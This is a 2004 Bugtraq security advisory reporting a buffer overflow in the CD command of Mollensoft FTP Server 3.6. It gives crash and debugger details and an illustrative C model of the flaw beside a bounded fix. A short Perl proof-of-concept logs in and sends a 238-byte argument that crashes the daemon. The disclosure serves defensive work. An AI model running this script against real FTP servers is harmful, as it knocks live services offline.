List: bugtraq
Subject: Mollensoft ftp Server ver 3.6 Buffer overflow
From: Chintan Trivedi <chesschintan () hotmail ! com>
Date: 2004-05-28 5:38:45
Message-ID: 20040528053845.14885.qmail () www ! securityfocus ! com
[ Mollensoft ftp Server ver 3.6 Buffer overflow ]
-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------
Vendor : http://www.mollensoft.com
Version : 3.6 (latest)
Vulnerability : Buffer Overflow
About Product
=============
Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for
Windows95/98/NT/2000. It includes New Security and Faster, More Efficient Rules Based
Access, Live Client activity Window as well as a specific Client breakdown window
(below) and significant enhancement in speed/stability and is especially designed for
Intranet Use!
(direct quote from website)
Description
===========
A buffer overflow exists in the handling of the "CD" command. An argument of 238 bytes
overruns a fixed-size buffer and overwrites a pointer that the daemon subsequently
dereferences, so the attacker controls the address the daemon reads from.
ftp> CD AAAAAAA...(238 times)
The ftp daemon crashes at this point with an error message saying
"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not
be read."
On debugging the process, the instruction at 0x50E0931F is found to be
"CMP BYTE PTR DS:[ESI], 1F", and the register ESI contains 0x41414141, i.e. the bytes
"AAAA" from the oversized argument. The application is therefore reading from
0x41414141, an address taken directly from attacker-supplied data, so an attacker can
force the application to read from an arbitrary memory location. What is demonstrated
here is a crash of the daemon (denial of service); if the corrupted data can also reach
a return address or another control-flow target, the vulnerability may be exploitable
remotely for complete access to the vulnerable system, but that is not shown here.
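The model below is an added illustration and not the advisory's own code or the
daemon's actual code: it shows how an unbounded copy of the CD argument into a
fixed buffer can overwrite an adjacent saved pointer, so that the byte scan the
crashing instruction belongs to dereferences 0x41414141 after 238 bytes of "A". The
frame layout (a 232-byte path buffer followed by a 4-byte pointer), the placeholder
pointer value, and the function names are assumptions chosen for the example; the
real daemon's layout is not known from the advisory. A bounded, control-character
rejecting handler is shown beside the vulnerable one.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout for illustration only; the real frame layout is unknown. */
#define PATH_BUF_SIZE 232u           /* fixed-size path buffer (assumed)      */
#define PTR_OFFSET    PATH_BUF_SIZE  /* saved pointer sits right after it     */
#define FRAME_SIZE    512u           /* model frame: big enough that the       */
                                     /* unbounded copy stays inside the model  */

/* Read the 4-byte pointer the handler later loads into ESI (little-endian x86). */
static uint32_t saved_ptr(const unsigned char *frame)
{
    uint32_t p;
    memcpy(&p, frame + PTR_OFFSET, sizeof p);
    return p;
}

/* Vulnerable handler: strcpy() with no check against PATH_BUF_SIZE. Returns the
 * value the saved pointer holds after the copy; for an argument longer than the
 * path buffer it is built from attacker bytes (0x41414141 for "AAAA..."). */
uint32_t cd_vulnerable(const char *arg)
{
    unsigned char frame[FRAME_SIZE];
    uint32_t legit = 0x00401000u;    /* placeholder for a valid pointer (assumed) */
    memset(frame, 0, sizeof frame);
    memcpy(frame + PTR_OFFSET, &legit, sizeof legit);
    if (strlen(arg) >= FRAME_SIZE)   /* guard for the model array only */
        return 0;
    strcpy((char *)frame, arg);      /* the bug: copy bounded by NUL, not by buffer */
    return saved_ptr(frame);
}

/* Hardened handler: bound the copy and reject control characters (the kind of
 * byte scan the crashing CMP instruction was performing). Returns 0 on success,
 * -1 if the argument does not fit, -2 if it contains a control character. */
int cd_safe(const char *arg, char *dst, size_t dstsz)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    for (size_t i = 0; i < n; i++)
        if ((unsigned char)arg[i] < 0x20)
            return -2;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Constructed test input: n bytes of 'A', as in the advisory's PoC. */
const char *make_payload(size_t n)
{
    static char buf[FRAME_SIZE];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    char path[PATH_BUF_SIZE];
    const char *payload = make_payload(238);
    printf("saved pointer after 238 x 'A': 0x%08x\n", cd_vulnerable(payload));
    printf("cd_safe(238 x 'A') -> %d\n", cd_safe(payload, path, sizeof path));
    printf("cd_safe(\"pub\")     -> %d (%s)\n", cd_safe("pub", path, sizeof path), path);
    return 0;
}
```

The point of the model is the second half of the overflow: the crash address in the
advisory is not a corrupted return address but a data pointer that happens to lie
after the buffer, which is why the first symptom is a read fault rather than a jump
to 0x41414141.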
Proof Of Concept
================
# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the daemon
use strict;
use warnings;
use IO::Socket::INET;

my $host   = "localhost";
my $port   = 21;
my $buffer = "A" x 238;   # 238 bytes overruns the CD argument buffer

my $socket = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port)
    or die "connect to $host:$port failed: $@";
my $test;
$socket->recv($test, 100);            # 220 banner
print $test;
print $socket "USER root\r\n";
$socket->recv($test, 100);
print $test;
print $socket "PASS password\r\n";
$socket->recv($test, 100);
print $test;
print $socket "CD $buffer\r\n";       # oversized argument triggers the crash
$socket->recv($test, 100);
print $test;
close($socket);
Credits
=======
Chintan Trivedi - chesschintan [at] hotmail.com
http://www.eos-india.net
Eye on Security Research Group - India